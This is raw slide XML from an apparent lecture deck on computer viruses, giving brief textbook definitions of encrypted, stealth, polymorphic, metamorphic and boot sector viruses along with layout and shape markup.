                        <a:rPr sz="2700" dirty="0">
                          <a:latin typeface="Times New Roman" panose="02020603050405020304"/>
                          <a:cs typeface="Times New Roman" panose="02020603050405020304"/>
                        </a:rPr>
                        <a:t>Encrypted virus</a:t>
                      </a:r>
                      <a:endParaRPr sz="27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25"/>
                        </a:spcBef>
                        <a:buFont typeface="Arial" panose="020B0604020202020204"/>
                        <a:buChar char="•"/>
                      </a:pPr>
                      <a:endParaRPr sz="600"/>
                    </a:p>
                    <a:p>
                      <a:pPr marL="1450340" marR="828040" lvl="1" indent="-337185" algn="just">
                        <a:lnSpc>
                          <a:spcPts val="2590"/>
                        </a:lnSpc>
                        <a:buSzPct val="89000"/>
                        <a:buFont typeface="Arial" panose="020B0604020202020204"/>
                        <a:buChar char="•"/>
                        <a:tabLst>
                          <a:tab pos="1450340" algn="l"/>
                        </a:tabLst>
                      </a:pPr>
                      <a:r>
                        <a:rPr sz="2700" dirty="0">
                          <a:latin typeface="Times New Roman" panose="02020603050405020304"/>
                          <a:cs typeface="Times New Roman" panose="02020603050405020304"/>
                        </a:rPr>
                        <a:t>a portion of the virus creates a random encryption key and encrypts the remainder of the virus</a:t>
                      </a:r>
                      <a:endParaRPr sz="27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1107440" indent="-342900">
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="20"/>
                        </a:spcBef>
                        <a:buSzPct val="89000"/>
                        <a:buFont typeface="Arial" panose="020B0604020202020204"/>
                        <a:buChar char="•"/>
                        <a:tabLst>
                          <a:tab pos="1107440" algn="l"/>
                        </a:tabLst>
                      </a:pPr>
                      <a:r>
                        <a:rPr sz="2700" dirty="0">
                          <a:latin typeface="Times New Roman" panose="02020603050405020304"/>
                          <a:cs typeface="Times New Roman" panose="02020603050405020304"/>
                        </a:rPr>
                        <a:t>Stealth virus</a:t>
                      </a:r>
                      <a:endParaRPr sz="27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25"/>
                        </a:spcBef>
                        <a:buFont typeface="Arial" panose="020B0604020202020204"/>
                        <a:buChar char="•"/>
                      </a:pPr>
                      <a:endParaRPr sz="600"/>
                    </a:p>
                    <a:p>
                      <a:pPr marL="1450340" marR="1132205" lvl="1" indent="-337185">
                        <a:lnSpc>
                          <a:spcPts val="2590"/>
                        </a:lnSpc>
                        <a:buSzPct val="89000"/>
                        <a:buFont typeface="Arial" panose="020B0604020202020204"/>
                        <a:buChar char="•"/>
                        <a:tabLst>
                          <a:tab pos="1450340" algn="l"/>
                        </a:tabLst>
                      </a:pPr>
                      <a:r>
                        <a:rPr sz="2700" dirty="0">
                          <a:latin typeface="Times New Roman" panose="02020603050405020304"/>
                          <a:cs typeface="Times New Roman" panose="02020603050405020304"/>
                        </a:rPr>
                        <a:t>a form of virus explicitly designed to hide itself from detection by anti-virus software</a:t>
                      </a:r>
                      <a:endParaRPr sz="27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1107440" indent="-342900">
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="20"/>
                        </a:spcBef>
                        <a:buSzPct val="89000"/>
                        <a:buFont typeface="Arial" panose="020B0604020202020204"/>
                        <a:buChar char="•"/>
                        <a:tabLst>
                          <a:tab pos="1107440" algn="l"/>
                        </a:tabLst>
                      </a:pPr>
                      <a:r>
                        <a:rPr sz="2700" dirty="0">
                          <a:latin typeface="Times New Roman" panose="02020603050405020304"/>
                          <a:cs typeface="Times New Roman" panose="02020603050405020304"/>
                        </a:rPr>
                        <a:t>Polymorphic virus</a:t>
                      </a:r>
                      <a:endParaRPr sz="27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1450340" lvl="1" indent="-337185">
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:buSzPct val="89000"/>
                        <a:buFont typeface="Arial" panose="020B0604020202020204"/>
                        <a:buChar char="•"/>
                        <a:tabLst>
                          <a:tab pos="1450340" algn="l"/>
                        </a:tabLst>
                      </a:pPr>
                      <a:r>
                        <a:rPr sz="2700" dirty="0">
                          <a:latin typeface="Times New Roman" panose="02020603050405020304"/>
                          <a:cs typeface="Times New Roman" panose="02020603050405020304"/>
                        </a:rPr>
                        <a:t>a virus that mutates with every infection</a:t>
                      </a:r>
                      <a:endParaRPr sz="27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1107440" indent="-342900">
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:buSzPct val="89000"/>
                        <a:buFont typeface="Arial" panose="020B0604020202020204"/>
                        <a:buChar char="•"/>
                        <a:tabLst>
                          <a:tab pos="1107440" algn="l"/>
                        </a:tabLst>
                      </a:pPr>
                      <a:r>
                        <a:rPr sz="2700" dirty="0">
                          <a:latin typeface="Times New Roman" panose="02020603050405020304"/>
                          <a:cs typeface="Times New Roman" panose="02020603050405020304"/>
                        </a:rPr>
                        <a:t>Metamorphic virus</a:t>
                      </a:r>
                      <a:endParaRPr sz="27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45"/>
                        </a:spcBef>
                        <a:buFont typeface="Arial" panose="020B0604020202020204"/>
                        <a:buChar char="•"/>
                      </a:pPr>
                      <a:endParaRPr sz="600"/>
                    </a:p>
                    <a:p>
                      <a:pPr marL="1450340" marR="826770" lvl="1" indent="-337185" algn="just">
                        <a:lnSpc>
                          <a:spcPct val="80000"/>
                        </a:lnSpc>
                        <a:buSzPct val="89000"/>
                        <a:buFont typeface="Arial" panose="020B0604020202020204"/>
                        <a:buChar char="•"/>
                        <a:tabLst>
                          <a:tab pos="1450340" algn="l"/>
                        </a:tabLst>
                      </a:pPr>
                      <a:r>
                        <a:rPr sz="2700" dirty="0">
                          <a:latin typeface="Times New Roman" panose="02020603050405020304"/>
                          <a:cs typeface="Times New Roman" panose="02020603050405020304"/>
                        </a:rPr>
                        <a:t>a virus that mutates and rewrites itself completely at each iteration and may change behavior as well as appearance</a:t>
                      </a:r>
                      <a:endParaRPr sz="27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 panose="020B0604020202020204"/>
                          <a:cs typeface="Arial" panose="020B0604020202020204"/>
                        </a:rPr>
                        <a:t>17</a:t>
                      </a:r>
                      <a:endParaRPr sz="1400">
                        <a:latin typeface="Arial" panose="020B0604020202020204"/>
                        <a:cs typeface="Arial" panose="020B060402020202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828800" y="4964429"/>
            <a:ext cx="5486400" cy="685800"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="5486400" h="685800">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="685800"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5486400" y="685800"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="54864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824227" y="4959858"/>
            <a:ext cx="5496306" cy="695706"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="5496306" h="695706">
                <a:moveTo>
                  <a:pt x="5496306" y="693419"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="5496306" y="2285"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5494020" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2285" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="2286"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="693420"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2286" y="695706"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4572" y="695706"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4572" y="9906"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9906" y="4572"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9905" y="9906"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5486399" y="9905"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5486400" y="4571"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5490972" y="9905"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5490972" y="695705"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5494020" y="695705"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5496306" y="693419"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="5496306" h="695706">
                <a:moveTo>
                  <a:pt x="9905" y="9906"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="9906" y="4572"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4572" y="9906"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9905" y="9906"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="5496306" h="695706">
                <a:moveTo>
                  <a:pt x="9905" y="685800"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="9905" y="9906"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4572" y="9906"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4572" y="685800"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9905" y="685800"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="5496306" h="695706">
                <a:moveTo>
                  <a:pt x="5490972" y="685799"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="4572" y="685800"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9906" y="690372"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9905" y="695706"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5486399" y="695705"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5486400" y="690371"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5490972" y="685799"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="5496306" h="695706">
                <a:moveTo>
                  <a:pt x="9905" y="695706"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="9906" y="690372"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4572" y="685800"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4572" y="695706"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9905" y="695706"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="5496306" h="695706">
                <a:moveTo>
                  <a:pt x="5490972" y="9905"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="5486400" y="4571"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5486399" y="9905"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5490972" y="9905"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="5496306" h="695706">
                <a:moveTo>
                  <a:pt x="5490972" y="685799"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="5490972" y="9905"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5486399" y="9905"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5486399" y="685799"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5490972" y="685799"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="5496306" h="695706">
                <a:moveTo>
                  <a:pt x="5490972" y="695705"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="5490972" y="685799"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5486400" y="690371"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5486399" y="695705"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5490972" y="69570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124200" y="5802629"/>
            <a:ext cx="5486400" cy="685800"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="5486400" h="685800">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="685800"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5486400" y="685800"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="54864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119627" y="5798058"/>
            <a:ext cx="5496306" cy="695706"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="5496306" h="695706">
                <a:moveTo>
                  <a:pt x="5496306" y="693419"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="5496306" y="2285"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5494020" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2285" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="2286"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="693420"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2286" y="695706"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4572" y="695706"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4572" y="9906"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9906" y="4572"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9905" y="9906"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5486399" y="9905"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5486400" y="4571"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5490972" y="9905"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5490972" y="695705"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5494020" y="695705"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5496306" y="693419"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="5496306" h="695706">
                <a:moveTo>
                  <a:pt x="9905" y="9906"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="9906" y="4572"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4572" y="9906"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9905" y="9906"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="5496306" h="695706">
                <a:moveTo>
                  <a:pt x="9905" y="685800"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="9905" y="9906"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4572" y="9906"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4572" y="685800"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9905" y="685800"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="5496306" h="695706">
                <a:moveTo>
                  <a:pt x="5490972" y="685799"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="4572" y="685800"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9906" y="690372"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9905" y="695706"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5486399" y="695705"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5486400" y="690371"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5490972" y="685799"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="5496306" h="695706">
                <a:moveTo>
                  <a:pt x="9905" y="695706"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="9906" y="690372"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4572" y="685800"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4572" y="695706"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9905" y="695706"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="5496306" h="695706">
                <a:moveTo>
                  <a:pt x="5490972" y="9905"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="5486400" y="4571"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5486399" y="9905"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5490972" y="9905"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="5496306" h="695706">
                <a:moveTo>
                  <a:pt x="5490972" y="685799"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="5490972" y="9905"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5486399" y="9905"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5486399" y="685799"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5490972" y="685799"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="5496306" h="695706">
                <a:moveTo>
                  <a:pt x="5490972" y="695705"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="5490972" y="685799"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5486400" y="690371"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5486399" y="695705"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5490972" y="69570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828800" y="5802629"/>
            <a:ext cx="1295400" cy="685800"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="1295400" h="685800">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="685800"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1295400" y="685800"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12954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339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824227" y="5798058"/>
            <a:ext cx="1305306" cy="695706"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="1305306" h="695706">
                <a:moveTo>
                  <a:pt x="1305306" y="693420"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="1305306" y="2286"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1303020" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2285" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="2286"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="693420"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2286" y="695706"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4572" y="695706"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4572" y="9906"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9906" y="4572"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9906" y="9906"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1295400" y="9906"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1295400" y="4572"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1299972" y="9906"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1299972" y="695706"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1303020" y="695706"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1305306" y="693420"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="1305306" h="695706">
                <a:moveTo>
                  <a:pt x="9906" y="9906"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="9906" y="4572"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4572" y="9906"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9906" y="9906"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="1305306" h="695706">
                <a:moveTo>
                  <a:pt x="9906" y="685800"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="9906" y="9906"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4572" y="9906"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4572" y="685800"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9906" y="685800"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="1305306" h="695706">
                <a:moveTo>
                  <a:pt x="1299972" y="685800"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="4572" y="685800"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9906" y="690372"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9906" y="695706"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1295400" y="695706"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1295400" y="690372"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1299972" y="685800"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="1305306" h="695706">
                <a:moveTo>
                  <a:pt x="9906" y="695706"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="9906" y="690372"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4572" y="685800"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4572" y="695706"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9906" y="695706"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="1305306" h="695706">
                <a:moveTo>
                  <a:pt x="1299972" y="9906"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="1295400" y="4572"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1295400" y="9906"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1299972" y="9906"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="1305306" h="695706">
                <a:moveTo>
                  <a:pt x="1299972" y="685800"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="1299972" y="9906"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1295400" y="9906"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1295400" y="685800"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1299972" y="685800"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="1305306" h="695706">
                <a:moveTo>
                  <a:pt x="1299972" y="695706"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="1299972" y="685800"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1295400" y="690372"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1295400" y="695706"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1299972" y="69570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9" name="object 9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651760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 panose="020B0606020202030204"/>
                          <a:cs typeface="Arial Narrow" panose="020B0606020202030204"/>
                        </a:rPr>
                        <a:t>Boot</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="3600" b="1" spc="-5" dirty="0">
                          <a:latin typeface="Arial Narrow" panose="020B0606020202030204"/>
                          <a:cs typeface="Arial Narrow" panose="020B0606020202030204"/>
                        </a:rPr>
                        <a:t> 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Sector</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="3600" b="1" spc="-5" dirty="0">
                          <a:latin typeface="Arial Narrow" panose="020B0606020202030204"/>
                          <a:cs typeface="Arial Narrow" panose="020B0606020202030204"/>
                        </a:rPr>
                        <a:t> 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Infectors</a:t>
                      </a:r>
                      <a:endParaRPr sz="3600">
                        <a:latin typeface="Arial Narrow" panose="020B0606020202030204"/>
                        <a:cs typeface="Arial Narrow" panose="020B060602020203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535940">
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                      </a:pPr>
                      <a:r>
                        <a:rPr sz="2700" dirty="0">
                          <a:latin typeface="Times New Roman" panose="02020603050405020304"/>
                          <a:cs typeface="Times New Roman" panose="02020603050405020304"/>
                        </a:rPr>
                        <a:t>A</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="2700" spc="-15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700" spc="0" dirty="0">
                          <a:latin typeface="Times New Roman" panose="02020603050405020304"/>
                          <a:cs typeface="Times New Roman" panose="02020603050405020304"/>
                        </a:rPr>
                        <a:t>virus that inserts itself into the boot sector of a disk</a:t>
                      </a:r>
                      <a:endParaRPr sz="27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25"/>
                        </a:spcBef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 panose="02020603050405020304"/>
                          <a:cs typeface="Times New Roman" panose="02020603050405020304"/>
                        </a:rPr>
                        <a:t>Section of disk contains the virus code</a:t>
                      </a:r>
                      <a:endParaRPr sz="27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20"/>
                        </a:spcBef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 panose="02020603050405020304"/>
                          <a:cs typeface="Times New Roman" panose="02020603050405020304"/>
                        </a:rPr>
                        <a:t>Executed when system first “sees” the disk</a:t>
                      </a:r>
                      <a:endParaRPr sz="27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40"/>
                        </a:spcBef>
                        <a:buFont typeface="Arial" panose="020B0604020202020204"/>
                        <a:buChar char="•"/>
                      </a:pPr>
                      <a:endParaRPr sz="650"/>
                    </a:p>
                    <a:p>
                      <a:pPr marL="878840" marR="817245" indent="-342900">
                        <a:lnSpc>
                          <a:spcPts val="292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 panose="02020603050405020304"/>
                          <a:cs typeface="Times New Roman" panose="02020603050405020304"/>
                        </a:rPr>
                        <a:t>Including at boot time … and completely independent of the operating system (!)</a:t>
                      </a:r>
                      <a:endParaRPr sz="27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280"/>
                        </a:spcBef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 panose="02020603050405020304"/>
                          <a:cs typeface="Times New Roman" panose="02020603050405020304"/>
                        </a:rPr>
                        <a:t>But depends upon CPU architecture.</a:t>
                      </a:r>
                      <a:endParaRPr sz="27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  <a:spcBef>
                          <a:spcPts val="40"/>
                        </a:spcBef>
                      </a:pPr>
                      <a:endParaRPr sz="1000"/>
                    </a:p>
                    <a:p>
                      <a:pPr marL="1450340">
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                      </a:pPr>
                      <a:r>
                        <a:rPr sz="2400" spc="-5" dirty="0">
                          <a:latin typeface="Arial Narrow" panose="020B0606020202030204"/>
                          <a:cs typeface="Arial Narrow" panose="020B0606020202030204"/>
                        </a:rPr>
                        <a:t>Maste</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="2400" spc="0" dirty="0">
                          <a:latin typeface="Arial Narrow" panose="020B0606020202030204"/>
                          <a:cs typeface="Arial Narrow" panose="020B0606020202030204"/>
                        </a:rPr>
                        <a:t>r</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="2400" spc="20" dirty="0">
                          <a:latin typeface="Arial Narrow" panose="020B0606020202030204"/>
                          <a:cs typeface="Arial Narrow" panose="020B0606020202030204"/>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="2400" spc="-5" dirty="0">
                          <a:latin typeface="Arial Narrow" panose="020B0606020202030204"/>
                          <a:cs typeface="Arial Narrow" panose="020B0606020202030204"/>
                        </a:rPr>
                        <a:t>boo</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="2400" spc="0" dirty="0">
                          <a:latin typeface="Arial Narrow" panose="020B0606020202030204"/>
                          <a:cs typeface="Arial Narrow" panose="020B0606020202030204"/>
                        </a:rPr>
                        <a:t>t</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="2400" spc="20" dirty="0">
                          <a:latin typeface="Arial Narrow" panose="020B0606020202030204"/>
                          <a:cs typeface="Arial Narrow" panose="020B0606020202030204"/>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="2400" spc="-5" dirty="0">
                          <a:latin typeface="Arial Narrow" panose="020B0606020202030204"/>
                          <a:cs typeface="Arial Narrow" panose="020B0606020202030204"/>
                        </a:rPr>
                        <a:t>record</a:t>
                      </a:r>
                      <a:endParaRPr sz="2400">
                        <a:latin typeface="Arial Narrow" panose="020B0606020202030204"/>
                        <a:cs typeface="Arial Narrow" panose="020B0606020202030204"/>
                      </a:endParaRPr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200"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="80"/>
                        </a:spcBef>
                      </a:pPr>
                      <a:endParaRPr sz="1200"/>
                    </a:p>
                    <a:p>
                      <a:pPr marL="1450340" marR="4271010">
                        <a:lnSpc>
                          <a:spcPct val="59000"/>
                        </a:lnSpc>
                        <a:tabLst>
                          <a:tab pos="2745740" algn="l"/>
                        </a:tabLst>
                      </a:pPr>
                      <a:r>
                        <a:rPr sz="3600" spc="-7" baseline="19000" dirty="0">
                          <a:latin typeface="Arial Narrow" panose="020B0606020202030204"/>
                          <a:cs typeface="Arial Narrow" panose="020B0606020202030204"/>
                        </a:rPr>
                        <a:t>Maliciou</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="3600" spc="0" baseline="19000" dirty="0">
                          <a:latin typeface="Arial Narrow" panose="020B0606020202030204"/>
                          <a:cs typeface="Arial Narrow" panose="020B0606020202030204"/>
                        </a:rPr>
                        <a:t>s	</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="2400" spc="-5" dirty="0">
                          <a:latin typeface="Arial Narrow" panose="020B0606020202030204"/>
                          <a:cs typeface="Arial Narrow" panose="020B0606020202030204"/>
                        </a:rPr>
                        <a:t>Maste</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="2400" spc="0" dirty="0">
                          <a:latin typeface="Arial Narrow" panose="020B0606020202030204"/>
                          <a:cs typeface="Arial Narrow" panose="020B0606020202030204"/>
                        </a:rPr>
                        <a:t>r</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="2400" spc="20" dirty="0">
                          <a:latin typeface="Arial Narrow" panose="020B0606020202030204"/>
                          <a:cs typeface="Arial Narrow" panose="020B0606020202030204"/>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="2400" spc="-5" dirty="0">
                          <a:latin typeface="Arial Narrow" panose="020B0606020202030204"/>
                          <a:cs typeface="Arial Narrow" panose="020B0606020202030204"/>
                        </a:rPr>
